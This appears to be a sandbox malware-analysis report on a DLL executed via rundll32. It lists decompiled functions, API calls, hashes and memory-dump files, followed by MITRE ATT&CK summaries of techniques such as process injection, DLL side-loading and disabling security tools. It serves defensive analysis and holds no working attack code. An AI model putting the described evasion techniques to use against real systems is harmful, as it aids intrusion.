Opcode ID: fb9c0ec1ad51e0f713722a0c7a45395b196e8043d1c89db28e15a4dcaea8b1c0
Instruction ID: 577ef5e3ec7947201b1c7d82e4947e8c3955ccfafe26d8b88281b948a3e7f53a
Opcode Fuzzy Hash: fb9c0ec1ad51e0f713722a0c7a45395b196e8043d1c89db28e15a4dcaea8b1c0
Instruction Fuzzy Hash: DD5128756A6605AFEB188F15CA40BAA77F8EF00718FA0471EDD1687E90DB31E860C794

Function 6C05BA13 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6C05C035: _free.LIBCMT ref: 6C05C043

Part of subcall function 6C05CC09: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,6C05D927,6C05FBE4,0000FDE9,00000000,?,?,?,6C05F95D,0000FDE9,00000000,?), ref: 6C05CCB5

GetLastError.KERNEL32 ref: 6C05BA7B
__dosmaperr.LIBCMT ref: 6C05BA82
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6C05BAC1
__dosmaperr.LIBCMT ref: 6C05BAC8

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: e5464925532292925ba66d608042bf811d9a23b887319439f4f3fab1b1181cdf
Instruction ID: 644f160c3848284b6d240c05c47d207050c4d563fb258d97e89acd12fa5b17a9
Opcode Fuzzy Hash: e5464925532292925ba66d608042bf811d9a23b887319439f4f3fab1b1181cdf
Instruction Fuzzy Hash: AF2198B5604205AFDB109F668E80F5BB7ECEF053687944619F568D7E90E735FC2087A0

Function 6C05B2CC Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6C05F6A4,?,00000001,6C05D998,?,6C05FB5E,00000001,?,?,?,6C05D927,?,00000000), ref: 6C05B2D1
_free.LIBCMT ref: 6C05B32E
_free.LIBCMT ref: 6C05B364
SetLastError.KERNEL32(00000000,00000006,000000FF,?,6C05FB5E,00000001,?,?,?,6C05D927,?,00000000,00000000,6C06CB78,0000002C,6C05D998), ref: 6C05B36F

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 794406c8613840d773d5ff42118183060cc23a0fe3476d3a0012f1ff0ec7abdc
Instruction ID: 21eb3ba20572b007c1c88f8a2c0a8b5b377a9d050e33cabd8f3fbe1429771dea
Opcode Fuzzy Hash: 794406c8613840d773d5ff42118183060cc23a0fe3476d3a0012f1ff0ec7abdc
Instruction Fuzzy Hash: EE11EB3170C705ABEB101A764F81B7F25F9A7C277C7A40624F234E3AC1DF21B8294160

Function 6C060666 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6C0600CA,?,00000001,?,00000001,?,6C05F633,?,?,00000001), ref: 6C06067D
GetLastError.KERNEL32(?,6C0600CA,?,00000001,?,00000001,?,6C05F633,?,?,00000001,?,00000001,?,6C05FB7F,6C05D927), ref: 6C060689

Part of subcall function 6C06064F: CloseHandle.KERNEL32(FFFFFFFE,6C060699,?,6C0600CA,?,00000001,?,00000001,?,6C05F633,?,?,00000001,?,00000001), ref: 6C06065F

___initconout.LIBCMT ref: 6C060699

Part of subcall function 6C060611: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C060640,6C0600B7,00000001,?,6C05F633,?,?,00000001,?), ref: 6C060624

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6C0600CA,?,00000001,?,00000001,?,6C05F633,?,?,00000001,?), ref: 6C0606AE

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 647c24aa93fe6898f8e74a21d6ebdf59982a6f4beffd4216b98a8d5514514926
Instruction ID: e31a89c3c756f7bf0931ed1a7a240c732e9a8bc372879fd48ef25c9a41d0a471
Opcode Fuzzy Hash: 647c24aa93fe6898f8e74a21d6ebdf59982a6f4beffd4216b98a8d5514514926
Instruction Fuzzy Hash: C3F03776144155BBCF125FD7CC04A9B3FF5FB46368B044120FA19C6620DB318820DBD5

Function 6C05AC4F Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6C05AC58

Part of subcall function 6C05B90F: HeapFree.KERNEL32(00000000,00000000,?,6C05AB0E), ref: 6C05B925
Part of subcall function 6C05B90F: GetLastError.KERNEL32(?,?,6C05AB0E), ref: 6C05B937

_free.LIBCMT ref: 6C05AC6B
_free.LIBCMT ref: 6C05AC7C
_free.LIBCMT ref: 6C05AC8D

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7e9b83b02c912b8eef1da8f286c606f93a8437bc0804cb47513c671c6e63988c
Instruction ID: f45cc9fbc0ceef70354747176ef24b5f150ad9e1fd065d46db13d71ed7d01cad
Opcode Fuzzy Hash: 7e9b83b02c912b8eef1da8f286c606f93a8437bc0804cb47513c671c6e63988c
Instruction Fuzzy Hash: E9E086F16249299FCF412F1BC4047A53F7EEB466143810016E40443B10CF7133729F88

Function 6C05C891 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 6C05C42C: GetOEMCP.KERNEL32(00000000,6C05C69D,6C05F2B8,00000000,00000000,00000000,00000000,?,6C05F2B8), ref: 6C05C457

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,6C05C6E4,?,00000000,6C05F2B8,00013385,?,?,?,?,00000000), ref: 6C05C8EF
GetCPInfo.KERNEL32(00000000,6C05C6E4,?,?,6C05C6E4,?,00000000,6C05F2B8,00013385,?,?,?,?,00000000,00000000), ref: 6C05C931

Strings

NKxo, xrefs: 6C05C899

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: CodeInfoPageValid
String ID: NKxo
API String ID: 546120528-1440849049
Opcode ID: 3a4a9c9492acdec43db16185b0ad5e2f65b3ad434e9574282492f08544e54f1d
Instruction ID: b04c64aed19ac5b1955c7d4caf5e34d6deeb8a054b5edb1112afa56da7047c7d
Opcode Fuzzy Hash: 3a4a9c9492acdec43db16185b0ad5e2f65b3ad434e9574282492f08544e54f1d
Instruction Fuzzy Hash: 015146B5A043459FEB11EF36C9447ABBBF4EF4A308F94402EC092C7A41E734A555CB90

Function 6C05C502 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(E8458D00,?,6C05F2C4,6C05F2B8,00000000), ref: 6C05C534

Strings

, xrefs: 6C05C579
NKxo, xrefs: 6C05C50D

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: Info
String ID: $NKxo
API String ID: 1807457897-3511269702
Opcode ID: b7b711cf8f9325c3b89767a0e797ecdfdc7aecefbab7c8a8d95d094e9c9327b5
Instruction ID: 87071b1da46a560758c6ad4605c7ec17bab4a91938dbeb0fadb0171eab19b6a2
Opcode Fuzzy Hash: b7b711cf8f9325c3b89767a0e797ecdfdc7aecefbab7c8a8d95d094e9c9327b5
Instruction Fuzzy Hash: 704170705042485BDB219B58CE84FFB7BFDEB09708FE404ACD5DA87582D234EA95CB50

Function 6C055D90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 6C055EC3

Strings

NKx, xrefs: 6C055DA1, 6C055DB7, 6C055E5E
NKx, xrefs: 6C055E77, 6C055EA3

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID: NKx$NKx
API String ID: 118556049-2281152737
Opcode ID: a4690615a8e15b848ae1f25d21b9aa08e005e4a2579464e3d385850e2d7959d3
Instruction ID: 4a10f7207382bad40db1e5a8ca7c63b4b756aa19e1538ce6ec8471929572f0ff
Opcode Fuzzy Hash: a4690615a8e15b848ae1f25d21b9aa08e005e4a2579464e3d385850e2d7959d3
Instruction Fuzzy Hash: 023137757052049BD7188E7CDA90B6EB7E9EF49324BE0033EE825C7B81D770A9648791

Function 6C05A367 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6C05A3AA, 6C05A3B1, 6C05A3E7

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: d1e94f0262cadfbaaf6f8c098a1a0c1f1cd2b07ac3a4a507b72c41b8cdac8c91
Instruction ID: 293751f031f1c6306720162ac2ba2f0d2212c6bf778da021a73686f5428b3a6c
Opcode Fuzzy Hash: d1e94f0262cadfbaaf6f8c098a1a0c1f1cd2b07ac3a4a507b72c41b8cdac8c91
Instruction Fuzzy Hash: 6C4196B1A04215AFDB11DFDD8A84BBFBBFCEB85714FA00066E51497740E7B09A64CB60

Function 6C05A92D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6C05A99B
_free.LIBCMT ref: 6C05A9BB

Strings

NKxo, xrefs: 6C05A949, 6C05A9D9

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: _free
String ID: NKxo
API String ID: 269201875-1440849049
Opcode ID: 63c7029b069a2280badd1b82295fb3b9c39ee77917b0fb11c6fee195f251c55f
Instruction ID: c5e01963ba1fa45ef6a598f0b25df6bda39ca68df82dfd77dd5162a97dca22f8
Opcode Fuzzy Hash: 63c7029b069a2280badd1b82295fb3b9c39ee77917b0fb11c6fee195f251c55f
Instruction Fuzzy Hash: 3941E276A002149FDB10DF68CA84BA9B3F6EF89318B664168D555EB740DB30ED15CB90

Function 6C05866A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6C05868F

Strings

MOC, xrefs: 6C0586A1
RCC, xrefs: 6C0586A9

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 667b79288bcbf0d20dae39905bf9f5994f170fc09127d3ac421f18a5d4dcf445
Instruction ID: fd6ad319b6a8d69628edb52ea28c9e05911ba6b607e506934b0d662bf6f6a532
Opcode Fuzzy Hash: 667b79288bcbf0d20dae39905bf9f5994f170fc09127d3ac421f18a5d4dcf445
Instruction Fuzzy Hash: B8415A71A10209AFCF05CF94CE80BEE7BF5BF48308F54825AEA14A7651D335EA60DB50

Function 6C05F8A5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,00000000,?,00000000,6C05FBE4,6C05D927,00000001,?,00000000,?,?,?,6C05D927,?,00000000), ref: 6C05F98E
GetLastError.KERNEL32(6C05FBE4,6C05D927,00000001,?,00000000,?,?,?,6C05D927,?,00000000,00000000,6C06CB78,0000002C,6C05D998,?), ref: 6C05F9BE

Strings

NKxo, xrefs: 6C05F8B4

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: NKxo
API String ID: 442123175-1440849049
Opcode ID: b5ae600186f23271be18452a19a7d02b7969baed9d8602d84b0a0d0dde304411
Instruction ID: f5997011811900a8061fd88e4bef21358ddced973df7f31f2845a29383540598
Opcode Fuzzy Hash: b5ae600186f23271be18452a19a7d02b7969baed9d8602d84b0a0d0dde304411
Instruction Fuzzy Hash: 2331AFB1B00619AFEB14CF69CD81BEAB3F9EB48304F5440A9E505D7690DB74EE90CB61

Function 6C05E10D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,E8458D00), ref: 6C05E1DD
__freea.LIBCMT ref: 6C05E1E6

Part of subcall function 6C05B833: HeapAlloc.KERNEL32(00000000,00013385,00013385,?,6C05C6BF,00000220,6C05F2B8,00013385,?,?,?,?,00000000,00000000,?,6C05F2B8), ref: 6C05B865

Strings

NKxo, xrefs: 6C05E115

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: AllocHeapStringType__freea
String ID: NKxo
API String ID: 2523373117-1440849049
Opcode ID: e4ae8dbc47780adba001302fca040a61973f8251e01c0e70c52a30149794238e
Instruction ID: bb4db3fa957b1d42940b90ab0582394ce88d66cafc799a9e419f686440f8efc8
Opcode Fuzzy Hash: e4ae8dbc47780adba001302fca040a61973f8251e01c0e70c52a30149794238e
Instruction Fuzzy Hash: 2931CF7190120AABEB108F65CD40FEF7BF8EF44B18F904124E86497650DB389961CBE4

Function 6C05F7BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,?,00000001,?,?,6C05FBD4,6C05D927,00000001,?,00000000,?,?), ref: 6C05F866
GetLastError.KERNEL32(?,6C05FBD4,6C05D927,00000001,?,00000000,?,?,?,6C05D927,?,00000000,00000000,6C06CB78,0000002C,6C05D998), ref: 6C05F88C

Strings

NKxo, xrefs: 6C05F7CB

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: NKxo
API String ID: 442123175-1440849049
Opcode ID: f227305758d5d41e92766b8b7e251d653fdb262a9ba279e181cd8f1109c2c856
Instruction ID: 7a0f523eb4782709c72eab7d62164c4eb1ad4df5abef12f042f50bea5087e27e
Opcode Fuzzy Hash: f227305758d5d41e92766b8b7e251d653fdb262a9ba279e181cd8f1109c2c856
Instruction Fuzzy Hash: 19219E31A002199FDB14CF29CD80AEEB3F9FF49314B5445AAE909D7250D730EE91CAA0

Function 6C05F6E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,?,00000001,?,?,6C05FBF4,6C05D927,00000001,?,00000000,?,?), ref: 6C05F77D
GetLastError.KERNEL32(?,6C05FBF4,6C05D927,00000001,?,00000000,?,?,?,6C05D927,?,00000000,00000000,6C06CB78,0000002C,6C05D998), ref: 6C05F7A3

Strings

NKxo, xrefs: 6C05F6F0

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: NKxo
API String ID: 442123175-1440849049
Opcode ID: 5bfe3d9eb031a3abee036b98a6fdba5b00604bbcb4fb26a2d8ad568729017dcf
Instruction ID: 91169fd60b26ca74bdb7e1341a9eb3d509a4d4bcbd9ebaf8c6e0d5c5ff68630a
Opcode Fuzzy Hash: 5bfe3d9eb031a3abee036b98a6fdba5b00604bbcb4fb26a2d8ad568729017dcf
Instruction Fuzzy Hash: 4921B134A0021C9FDB15CF6AC980AEDB7F9EB8D305F6441A9E946D7601D634EE468B60

Function 6C056791 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6C056B4D
___raise_securityfailure.LIBCMT ref: 6C056C35

Strings

NKxo, xrefs: 6C056C16

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: NKxo
API String ID: 3761405300-1440849049
Opcode ID: 9a5e144dfb0364b07398cb8388ed9f1834e7c4dd76a828570c85e33015a86641
Instruction ID: fe72b962c1f3588f34a596e96831d6ce71fc80d5a75a1066a58155abe5e963e1
Opcode Fuzzy Hash: 9a5e144dfb0364b07398cb8388ed9f1834e7c4dd76a828570c85e33015a86641
Instruction Fuzzy Hash: 7C2114B57053019BEB00CF1BD585B643BFCBB4A314F60502AE618CBB91EB705484CF48

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

